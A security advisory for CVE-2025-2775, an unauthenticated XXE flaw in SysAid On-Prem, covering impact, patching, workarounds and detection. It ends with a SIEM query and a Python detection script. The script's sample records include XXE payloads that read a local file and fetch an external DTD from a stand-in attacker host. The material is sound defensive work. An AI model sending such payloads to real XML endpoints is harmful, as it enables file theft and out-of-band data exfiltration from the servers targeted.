CVE-2025-2775

9.3 CRITICAL CISA KEV

📋 TL;DR

SysAid On-Prem versions up to and including 23.3.40 contain an unauthenticated XML External Entity (XXE) vulnerability in the Checkin processing functionality. An attacker who can reach the Checkin endpoint can use it, without any credentials, to read files from the server and potentially take over administrator accounts. Organizations running vulnerable SysAid On-Prem instances are affected.

💻 Affected Systems

Products:
  • SysAid On-Prem
Versions: <= 23.3.40
Operating Systems: All supported OS for SysAid
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects On-Prem deployments, not cloud/SaaS versions. Checkin functionality is typically enabled by default.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise including administrator account takeover, sensitive file exfiltration, and potential remote code execution leading to full organizational network access.

🟠

Likely Case

Unauthenticated attackers reading sensitive files (configuration files, credentials) and potentially escalating to administrator privileges for further system compromise.

🟢

If Mitigated

Limited impact with proper network segmentation and monitoring, though file read capabilities may still expose sensitive information.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation is straightforward, with a public proof-of-concept available. CISA has added this CVE to its Known Exploited Vulnerabilities catalog.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 23.3.41 or later

Vendor Advisory: https://documentation.sysaid.com/docs/24-40-60

Restart Required: Yes

Instructions:

1. Back up the current SysAid installation and database.
2. Download and install SysAid version 23.3.41 or later from the official vendor portal.
3. Follow the vendor upgrade documentation.
4. Restart SysAid services.
5. Verify the upgrade succeeded.

🔧 Temporary Workarounds

Disable Checkin Processing

Platform: all

Temporarily disable the vulnerable Checkin processing functionality if immediate patching is not possible.

# Requires SysAid configuration modification - consult vendor documentation

Network Access Control

Platform: all

Restrict access to SysAid web interface to trusted IP addresses only.

# Configure firewall rules to limit access to SysAid ports (typically 8080, 8443)

🧯 If You Can't Patch

  • Immediately isolate SysAid servers from internet access and restrict to internal trusted networks only.
  • Implement strict network monitoring and alerting for XXE attack patterns against SysAid endpoints.

🔍 How to Verify

Check if Vulnerable:

Check SysAid version in administration interface or via version file in installation directory. Versions <= 23.3.40 are vulnerable.

Check Version:

# Check SysAid version via web interface at /sysaid/Login.jsp or check version.txt in installation directory

Verify Fix Applied:

Confirm that the SysAid version is 23.3.41 or later. Test the Checkin functionality with a benign XXE test payload (one that references only a harmless local resource) to confirm remediation.

📡 Detection & Monitoring

Log Indicators:

  • XML parsing errors in SysAid logs
  • Unusual file access patterns
  • Authentication attempts from unexpected sources

Network Indicators:

  • HTTP POST requests to Checkin endpoints with XML payloads containing external entity references
  • Outbound connections to attacker-controlled servers from SysAid host

SIEM Query:

source="sysaid" AND http_method="POST" AND uri="*checkin*" AND (content="*<!ENTITY*" OR content="*SYSTEM*")
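The same detection logic as the SIEM query above, as an added example that is not part of the original advisory, run over constructed sample request records (the field names mirror the query; the records and URIs are invented for illustration, not captured SysAid traffic). It also shows why the `*SYSTEM*` term must be grouped with the body condition: an unrelated POST whose body merely contains the word SYSTEM is not flagged.

```python
import re

# Constructed sample request records (not real SysAid logs). Field names
# mirror the SIEM query: source, http_method, uri, content.
SAMPLE_REQUESTS = [
    {"source": "sysaid", "http_method": "POST", "uri": "/sysaid/checkin",
     "content": '<?xml version="1.0"?><checkin><agent>ws-01</agent></checkin>'},
    {"source": "sysaid", "http_method": "POST", "uri": "/sysaid/checkin",
     "content": '<?xml version="1.0"?><!DOCTYPE c [<!ENTITY x SYSTEM "file:///etc/hostname">]>'
                '<checkin><agent>&x;</agent></checkin>'},
    {"source": "sysaid", "http_method": "POST", "uri": "/sysaid/checkin",
     "content": '<!DOCTYPE c [<!ENTITY % p SYSTEM "http://attacker.example/x.dtd"> %p;]><checkin/>'},
    # Unrelated POST whose body happens to contain the word SYSTEM: a query with a
    # dangling OR "*SYSTEM*" term would match this; the check below must not.
    {"source": "sysaid", "http_method": "POST", "uri": "/sysaid/api/v1/tickets",
     "content": '{"note": "SYSTEM maintenance window approved"}'},
    {"source": "sysaid", "http_method": "GET", "uri": "/sysaid/checkin", "content": ""},
]

# An XXE payload needs a DOCTYPE with an entity declaration that points at an
# external resource (SYSTEM or PUBLIC identifier). Parameter entities (% name)
# are the usual vehicle for out-of-band exfiltration, so both forms are matched.
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)


def checkin_xxe_reason(rec):
    """Return a short reason if the record looks like an XXE attempt against
    a Checkin endpoint, otherwise None."""
    if rec.get("source") != "sysaid" or rec.get("http_method") != "POST":
        return None
    if "checkin" not in rec.get("uri", "").lower():
        return None
    body = rec.get("content", "")
    if EXTERNAL_ENTITY_RE.search(body):
        return "external entity declaration in Checkin XML"
    if DOCTYPE_RE.search(body):
        # Agent traffic should not carry a DOCTYPE at all; flag it at lower severity.
        return "DOCTYPE declaration in Checkin XML"
    return None


def scan_requests(records):
    """Return (index, reason) for every record that matches."""
    hits = [(i, checkin_xxe_reason(rec)) for i, rec in enumerate(records)]
    return [(i, reason) for i, reason in hits if reason]


if __name__ == "__main__":
    for i, reason in scan_requests(SAMPLE_REQUESTS):
        print(f"record {i}: {reason} ({SAMPLE_REQUESTS[i]['uri']})")
```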
